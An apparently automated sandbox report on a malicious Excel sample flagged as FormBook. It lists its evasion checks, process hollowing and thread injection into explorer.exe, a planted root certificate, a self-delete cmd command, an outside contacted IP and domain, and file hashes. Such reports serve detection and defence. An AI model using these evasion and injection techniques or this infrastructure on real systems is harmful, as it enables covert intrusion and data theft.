Source: C:\Users\Public\vbc.exe	Code function: 4_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	4_2_0044E03C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0043812C IsIconic,GetCapture,	4_2_0043812C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	4_2_004389E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,	4_2_00428C3C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	4_2_00439260
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	4_2_00451770
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	4_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	7_2_00451054
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	7_2_0044E03C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0043812C IsIconic,GetCapture,	7_2_0043812C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	7_2_004389E0
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,	7_2_00428C3C
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	7_2_00439260
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	7_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	7_2_00451820
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	10_2_00451054
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	10_2_0044E03C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0043812C IsIconic,GetCapture,	10_2_0043812C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	10_2_004389E0
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,	10_2_00428C3C
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	10_2_00439260
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	10_2_00451770
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	10_2_00451820

Stores large binary data to the registry

Source: C:\Users\Public\vbc.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\Public\vbc.exe

4_2_0042A8F4

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\vbc.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000002118604 second address: 000000000211860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000211899E second address: 00000000021189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 000000000008899E second address: 00000000000889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003BC8604 second address: 0000000003BC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003BC899E second address: 0000000003BC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003A18604 second address: 0000000003A1860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Odhbljup.exe	RDTSC instruction interceptor: First address: 0000000003A1899E second address: 0000000003A189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042D734	4_2_0042D734
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_0042D734	7_2_0042D734
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0042D734	10_2_0042D734

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2812	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2128	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Odhbljup.exe TID: 1184	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Odhbljup.exe TID: 1712	Thread sleep time: -120000s >= -30000s	Jump to behavior

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0042D734		4_2_0042D734
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_0042D734		10_2_0042D734

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_02E966E8 rdtsc

0_2_02E966E8

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\Public\vbc.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	4_2_004505B0
Source: C:\Users\user\Odhbljup.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	7_2_004505B0
Source: C:\Users\user\Odhbljup.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	10_2_004505B0

Source: explorer.exe, 00000006.00000000.544520820.00000000045D6000.00000004.00000001.sdmp

Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004244DC GetSystemInfo,

4_2_004244DC

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	4_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	10_2_004057AC

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00459820 LoadLibraryA,GetProcAddress,

4_2_00459820

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\NAPSTAT.EXE

Code function: 12_2_01FD26F8 mov eax, dword ptr fs:[00000030h]

12_2_01FD26F8

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_02E966E8 rdtsc

0_2_02E966E8

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Odhbljup.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process token adjusted: Debug	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\NAPSTAT.EXE

Code function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,

12_2_01FC00C4

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 87.98.234.164 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.urzeczenie.com

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 870000

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.678046443.0000000000860000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.538186590.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\Public\vbc.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_00405984
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,	4_2_004062CC
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,GetACP,	4_2_0040CAF8
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,	4_2_0040B4DC
Source: C:\Users\Public\vbc.exe	Code function: GetLocaleInfoA,	4_2_0040B528
Source: C:\Users\Public\vbc.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	4_2_00405A8F
Source: C:\Users\user\Odhbljup.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_2_00405984
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	7_2_004062CC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,GetACP,	7_2_0040CAF8
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	7_2_0040B4DC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	7_2_0040B528
Source: C:\Users\user\Odhbljup.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	7_2_00405A8F
Source: C:\Users\user\Odhbljup.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_00405984
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	10_2_004062CC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,GetACP,	10_2_0040CAF8
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	10_2_0040B4DC
Source: C:\Users\user\Odhbljup.exe	Code function: GetLocaleInfoA,	10_2_0040B528
Source: C:\Users\user\Odhbljup.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_00405A8F

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00409F7C GetLocalTime,

4_2_00409F7C

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0043DD6C GetVersion,

4_2_0043DD6C

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Windows Analysis Report 7009.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	532894
Product:	CloudBasic
Start time:	19:32:36
Start date:	02.12.2021
Sample:	7009.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	8305dc6702f80d7ebe34cd8c63297561
SHA1:	db055cce075213d510de5ca9044ea76036dbcd07
SHA256:	9eae576f7ecc05f106a7cfa605b1ca5bcd02c8d1c2c926920c0d7f0cb605b345
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Odhbljupmsgjmlbgxyicvyabvfcycds[1]	data	A8E5DCC8482C82EE2689930961F1420B	D072977890DFA9AE598851F02C6BBEE38A1DC148	1E3AE3EFA50C86B73A8A24E087439BEFEBC092D41C4EF5403A1AE8280743F6FA
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Odhbljupmsgjmlbgxyicvyabvfcycds[2]	Unknown	A8E5DCC8482C82EE2689930961F1420B	D072977890DFA9AE598851F02C6BBEE38A1DC148	1E3AE3EFA50C86B73A8A24E087439BEFEBC092D41C4EF5403A1AE8280743F6FA
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Odhbljupmsgjmlbgxyicvyabvfcycds[1]	data	A8E5DCC8482C82EE2689930961F1420B	D072977890DFA9AE598851F02C6BBEE38A1DC148	1E3AE3EFA50C86B73A8A24E087439BEFEBC092D41C4EF5403A1AE8280743F6FA
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	3A9AE96D1F6404FCCF5BD99B7C5C0383	2D0444EF8FE64348EEE4D748B0528E3799D18304	B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10F6923B.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1119DDB7.png	PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced	A7E2241249BDCC0CE1FAAF9F4D5C32AF	3125EA93A379A846B0D414B42975AADB72290EB4	EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19552301.png	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced	63ED10C9DF764CF12C64E6A9A2353D7D	608BE0D9462016EA4F05509704CE85F3DDC50E63	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\437E7858.png	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced	63ED10C9DF764CF12C64E6A9A2353D7D	608BE0D9462016EA4F05509704CE85F3DDC50E63	4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EC276A2.png	PNG image data, 600 x 306, 8-bit colormap, non-interlaced	C31D090D0B6B5BCA539D0E9DB0C57026	D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886	687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6037F43A.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\628BEF00.png	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced	58DD6AF7C438B638A88D107CC87009C7	F25E7F2F240DC924A7B48538164A5B3A54E91AC6	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D082F3.png	PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced	58DD6AF7C438B638A88D107CC87009C7	F25E7F2F240DC924A7B48538164A5B3A54E91AC6	9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86E287DD.png	PNG image data, 600 x 306, 8-bit colormap, non-interlaced	C31D090D0B6B5BCA539D0E9DB0C57026	D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886	687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A05E2D0E.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	7310A627F7793EEE1EAB78907ECAB185	21662BC1B328E9D971A16D689878430312B9D71A	690B8CE7E92B9276762FB2405B45E537A8326F2949DA3630B56A4ABDECB270E5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD1EF474.png	PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced	A7E2241249BDCC0CE1FAAF9F4D5C32AF	3125EA93A379A846B0D414B42975AADB72290EB4	EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3862C4C.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB79A47F.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF4CA1E5.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
